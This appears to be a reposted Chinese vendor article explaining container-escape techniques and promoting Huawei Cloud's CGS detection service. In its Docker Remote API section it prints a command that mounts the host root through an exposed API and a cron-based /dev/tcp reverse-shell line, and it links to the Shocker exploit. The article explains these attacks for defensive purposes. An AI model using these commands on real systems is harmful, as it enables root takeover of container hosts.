容器VS虛擬機

虛擬機（VM）是對物理硬件的抽象，將一臺服務(wù)器轉(zhuǎn)化為多臺服務(wù)器。Hypervisor允許在一臺機器上運行多個虛擬機。每個虛擬機都包含操作系統(tǒng)、應(yīng)用程序、必要的二進制文件和庫的完整副本，占用數(shù)十GB的空間，虛擬機啟動速度也比較慢。

容器是應(yīng)用程序?qū)拥囊粋€抽象，將代碼和依賴打包在一起。多個容器可以運行在同一臺機器上，與其他容器共享操作系統(tǒng)內(nèi)核，每個容器在用戶空間中作為隔離的進程運行。容器比虛擬機占用更少的空間（容器鏡像通常只有幾十MB大?。梢蕴幚砀嗟膽?yīng)用程序。

容器逃逸

容器逃逸，是容器技術(shù)啟用以來一直被關(guān)注的問題，甚至被認為是容器的首要安全問題。所謂“逃逸”，指的是“流氓”容器/虛擬機嘗試突破隔離環(huán)境的限制，訪問宿主系統(tǒng)或者在同一個系統(tǒng)上的同駐容器或虛擬機。從而造成敏感信息泄露，或者系統(tǒng)及服務(wù)發(fā)生DOS的行為。

但正是由于容器與宿主系統(tǒng)共享內(nèi)核，因此容器與宿主機有著更大的接觸面，隔離層次更少，更容易從容器內(nèi)實施逃逸攻擊。因此，如何解決容器逃逸安全風險，避免容器逃逸攻擊帶來的損失是容器安全中最為重要的一個問題。

容器逃逸常用手段

通過容器自身漏洞及內(nèi)核漏洞逃逸

攻擊的主要途徑之一就是利用漏洞，通過程序設(shè)計或?qū)崿F(xiàn)的缺陷來執(zhí)行非法操作，容器逃逸也不例外。容器自身漏洞是其利用進行逃逸的路徑之一，同時由于容器共享宿主系統(tǒng)內(nèi)核，因此內(nèi)核漏洞是其逃逸的另一路徑，同時由于內(nèi)核漏洞的數(shù)量遠遠大于容器自身漏洞，因此內(nèi)核漏洞甚至成為容器逃逸更為主要的一個手段。

利用容器漏洞逃逸 – shocker攻擊

Shocker攻擊是容器逃逸最著名的案例，其本質(zhì)是利用了一個不常用的系統(tǒng)調(diào)用open_by_handle_at，同時借助docker1.0前版本并未限制CAP_DAC_READ_SEARCH能力，并將容器啟動時會掛載宿主機文件到容器內(nèi)（如舊版本的/.dockerinit，新版本的/etc/hosts）作為起點，執(zhí)行暴力破解攻擊，最終獲取到要訪問的宿主系統(tǒng)文件的句柄信息并進行讀取，從而實現(xiàn)逃逸。

Github地址：https://github.com/gabrtv/shocker

容器執(zhí)行shocker攻擊逃逸訪問宿主系統(tǒng)/etc/shadow文件：

　　內(nèi)核漏洞利用逃逸 – dirtycow攻擊

DirtyCow（臟牛漏洞，CVE-2016-5195）是Linux內(nèi)核中的一個權(quán)限提升漏洞，其也可被容器利用實施逃逸。容器利用dirtycow漏洞改寫虛擬動態(tài)共享庫VDSO（Virtual Dynamically Shared Objec），并將shellcode置入其中，當主機系統(tǒng)進程調(diào)用并執(zhí)行修改后的內(nèi)容時，就會借用此進程身份執(zhí)行置入的shellcode，并最終在容器內(nèi)獲得一個來自主機的root權(quán)限的shell。

不安全配置引發(fā)逃逸

不安全啟動，如privileged特權(quán)容器

容器以–privileged參數(shù)啟動時稱為特權(quán)容器，特權(quán)容器顧名思義具有較高權(quán)限，包括對宿主機上的設(shè)備的訪問權(quán)限。因此，攻擊者可以直接在容器內(nèi)mount主機設(shè)備并進行文件訪問，從而輕而易舉實現(xiàn)逃逸。

不安全掛載，如掛載docker.sock到容器

Docker.sock文件是一個Unix domain socket文件，是Docker daemon默認監(jiān)聽的套接字文件，docker client通過它與docker daemon進行通信。docker client將信息查詢和下發(fā)命令等請求通過docker.sock發(fā)給docker daemon，然后由deamon執(zhí)行具體請求，包括鏡像查詢、容器創(chuàng)建等。

將docker.sock掛載到容器內(nèi)，可以在容器內(nèi)繼續(xù)運行一個容器，實現(xiàn)docker in docker，并可在容器內(nèi)容器啟動時通過-v參數(shù)將宿主機根目錄掛載到容器內(nèi)，從而在容器內(nèi)訪問宿主機文件，實現(xiàn)逃逸。

Docker remote api未授權(quán)訪問

默認情況下，docker daemon只允許通過unix domain socket – docker.sock進行本地通信操作，但除此之外，docker daemon也提供了Restful API供遠端client訪問（daemon通過-H參數(shù)指定監(jiān)聽端口），如果未對訪問進行權(quán)限控制及合規(guī)性檢查，則攻擊者也可以訪問這個API執(zhí)行高危操作，并實施逃逸攻擊。

例如一種攻擊場景：

通過Remote API創(chuàng)建一個容器，并將宿主系統(tǒng)根目錄掛載到容器內(nèi)：

　　# docker -H tcp://$IP:$PORT run -it -v /:/mnt ubuntu /bin/bash

　　其中：$IP表示docker daemon服務(wù)ip，$PORT表示Remote API監(jiān)聽端口

　　將反彈shell命令寫入計劃任務(wù)文件

　　# echo ‘* * * * * /bin/bash -i >& /dev/tcp/$IP/$PORT 0>&1’ >> /mnt/var/spool/cron/crontabs/root

　　其中：$IP表示攻擊端IP，$PROT表示攻擊端監(jiān)聽端口

攻擊端監(jiān)聽上一步中的$PORT端口，獲取來自對端（docker服務(wù)所在系統(tǒng)）的具有root權(quán)限得反彈shell，并任意訪問。

　　華為云容器安全服務(wù)CGS之逃逸安全防護方案

華為云容器安全服務(wù)CGS

華為云容器安全服務(wù)CGS構(gòu)建了容器安全威脅縱深防御體系，提供包括鏡像掃描、威脅檢測與威脅防護的一整套容器安全能力，提供針對容器的Build、Ship、Run全生命周期保護能力，滲透到整個容器DevOps流程，保證容器虛擬環(huán)境從開發(fā)到生產(chǎn)整個流程的安全。其中，容器逃逸檢測是CGS的核心功能之一，它通過如下手段構(gòu)建系統(tǒng)化的容器逃逸全面防護能力：

監(jiān)控容器不安全配置啟動

前文中提到，不安全配置是容器逃逸的一個重要原因。因此，監(jiān)控容器的不安全啟動也是容器逃逸防護的一個重要手段。CGS可以針對容器啟動的各種不安全配置進行監(jiān)控，包括啟動特權(quán)容器、掛載宿主機文件、安全策略關(guān)閉、特權(quán)端口映射等，從容器創(chuàng)建伊始就檢測逃逸風險，實現(xiàn)整體防護方案第一步。

容器行為深度分析

容器啟動后，CGS可對容器運行過程中的行為進行實時跟蹤和觀察，監(jiān)控容器內(nèi)的進程運行、文件訪問、網(wǎng)絡(luò)連接、系統(tǒng)調(diào)用等行為，并對行為進行深度分析，從行為過程體現(xiàn)出來的特征到行為所產(chǎn)生的結(jié)果進行全面分析檢測，有效發(fā)現(xiàn)容器已知和未知漏洞利用逃逸攻擊行為并進行告警。

容器基線機器學習

一般而言，容器的行為通常固定且純粹，比如一個提供web服務(wù)的容器內(nèi)可能只會運行一個nginx進程，一個提供DB服務(wù)的容器內(nèi)可能只會運行一個mysql進程，并且進程所執(zhí)行的操作，包括文件訪問、系統(tǒng)調(diào)用、網(wǎng)絡(luò)連接等行為都有固定合理范圍，因此可以對容器圈定正常行為范圍，構(gòu)建行為基線。CGS利用機器學習技術(shù)，從靜態(tài)和動態(tài)兩個維度分析容器正常行為并建立基線，使得基線模型更準確、更完整，然后根據(jù)基線跟蹤容器行為，感知基線以外的異常行為，實現(xiàn)對攻擊行為的全面感知，并有效提升對于容器利用0day漏洞進行逃逸攻擊的檢測能力。

華為云CGS容器逃逸方案防護機制內(nèi)置在防護平臺，無需用戶參與即可實現(xiàn)容器逃逸系統(tǒng)化檢測，具有良好的易用性，同時方案采用事件驅(qū)動機制實現(xiàn)性能高、反應(yīng)快，為容器安全保駕護航。（轉(zhuǎn)自至頂網(wǎng)）

zhangnn